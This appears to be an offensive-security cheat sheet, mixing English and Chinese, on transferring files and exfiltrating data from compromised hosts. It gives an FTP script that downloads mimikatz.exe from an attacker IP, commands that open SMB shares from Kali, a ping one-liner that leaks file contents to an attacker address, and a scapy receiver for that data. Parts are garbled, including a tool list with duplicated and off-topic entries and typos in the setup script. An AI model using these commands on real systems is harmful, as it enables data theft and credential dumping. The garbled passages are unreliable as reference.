#Run the following script to configure the FTP server
#!/bin/bash
groupadd ftpgroup
useradd -g ftpgroup -d /dev/null -s /etc ftpuser
pure-pwd useradd fusr -u ftpuser -d /ftphome
pure-pw mkdb
cd /etc/pure-ftpd/auth/
ln -s ../conf/PureDB 60pdb
mkdir -p /ftphome
chown -R ftpuser:ftpgroup /ftphome/
/etc/init.d/pure-ftpd restart
Windows 客户端
#Work well with python. With pure-ftp use fusr:ftp
echo open 10.11.0.41 21 > ftp.txt
echo USER anonymous >> ftp.txt
echo anonymous >> ftp.txt
echo bin >> ftp.txt
echo GET mimikatz.exe >> ftp.txt
echo bye >> ftp.txt
ftp -n -v -s:ftp.txt
SMB
Kali作为服务器
kali_op1> impacket-smbserver -smb2support kali `pwd` # Share current directory
kali_op2> smbserver.py -smb2support name /path/folder # Share a folder
#For new Win10 versions
impacket-smbserver -smb2support -user test -password test test `pwd`
或者使用samba创建一个smb共享:
apt-get install samba
mkdir /tmp/smb
chmod 777 /tmp/smb
#Add to the end of /etc/samba/smb.conf this:
[public]
comment = Samba on Ubuntu
path = /tmp/smb
read only = no
browsable = yes
guest ok = Yes
#Start samba
service smbd restart
Windows
Exfiltration
Techniques
Exfiltration Over C2 Channel: Utilize the existing command and control channel to exfiltrate data.
Exfiltration Over Alternative Protocol: Use alternative protocols such as DNS, ICMP, or HTTP to exfiltrate data.
Exfiltration Over Unencrypted Protocols: Leverage unencrypted protocols like FTP, Telnet, or HTTP to exfiltrate data.
Exfiltration Over Encrypted Protocols: Utilize encrypted protocols like HTTPS or SSH to exfiltrate data.
Exfiltration Over Ingress Filtering: Bypass egress filtering by exfiltrating data over allowed ingress channels.
Tools
Netcat: A versatile networking utility for reading from and writing to network connections.
PowerShell: A task automation framework for configuring systems and automating tasks.
Certutil: Command-line utility for managing certificates.
Bitsadmin: A tool to create and manage transfer jobs using Background Intelligent Transfer Service (BITS).
FTP: File Transfer Protocol for transferring files between a client and server on a network.
Wget: A command-line utility for downloading files from the web.
Curl: A tool for transferring data with URLs.
SMBClient: A tool for accessing shared folders.
RDP: Remote Desktop Protocol for remote access to Windows systems.
WMIC: Command-line tool for Windows Management Instrumentation.
Reg: Command-line utility for working with the registry.
Schtasks: Command-line tool for managing scheduled tasks.
Bitsadmin: Command-line tool for managing Background Intelligent Transfer Service (BITS) jobs.
Vssadmin: Command-line tool for managing Volume Shadow Copy Service.
Wevtutil: Command-line tool for managing event logs.
Forfiles: Command-line tool for batch processing files.
Robocopy: Command-line tool for copying files and directories.
Diskshadow: Command-line tool for managing shadow copies.
Net: Command-line tool for managing network resources.
Tasklist: Command-line tool for listing running processes.
Taskkill: Command-line tool for terminating processes.
Regsvr32: Command-line tool for registering and unregistering DLLs.
Regini: Command-line tool for modifying registry permissions.
Regsvcs: Command-line tool for registering and unregistering .NET components.
Regsvr32: Command-line tool for registering and unregistering DLLs.
Regsvr32: Command-line tool for registering and unregistering DLLs.
CMD-Wind> \\10.10.14.14\path\to\exe
CMD-Wind> net use z: \\10.10.14.14\test /user:test test #For SMB using credentials
WindPS-1> New-PSDrive -Name "new_disk" -PSProvider "FileSystem" -Root "\\10.10.14.9\kali"
WindPS-2> cd new_disk:
# To exfiltrate the content of a file via pings you can do:
xxd -p -c 4 /path/file/exfil | while read line; do ping -c 1 -p $line <IP attacker>; done
#This will 4bytes per ping packet (you could probably increase this until 16)
from scapy.all import *
#This is ippsec receiver created in the HTB machine Mischief
def process_packet(pkt):
if pkt.haslayer(ICMP):
if pkt[ICMP].type == 0:
data = pkt[ICMP].load[-4:] #Read the 4bytes interesting
print(f"{data.decode('utf-8')}", flush=True, end="")
sniff(iface="tun0", prn=process_packet)
SMTP
如果您可以将数据发送到SMTP服务器,您可以使用Python创建一个SMTP来接收数据:
sudo python -m smtpd -n -c DebuggingServer :25
TFTP
在XP和2003中默认情况下(在其他系统中需要在安装过程中显式添加)
在Kali中,启动TFTP服务器:
#I didn't get this options working and I prefer the python option
mkdir /tftp
atftpd --daemon --port 69 /tftp
cp /path/tp/nc.exe /tftp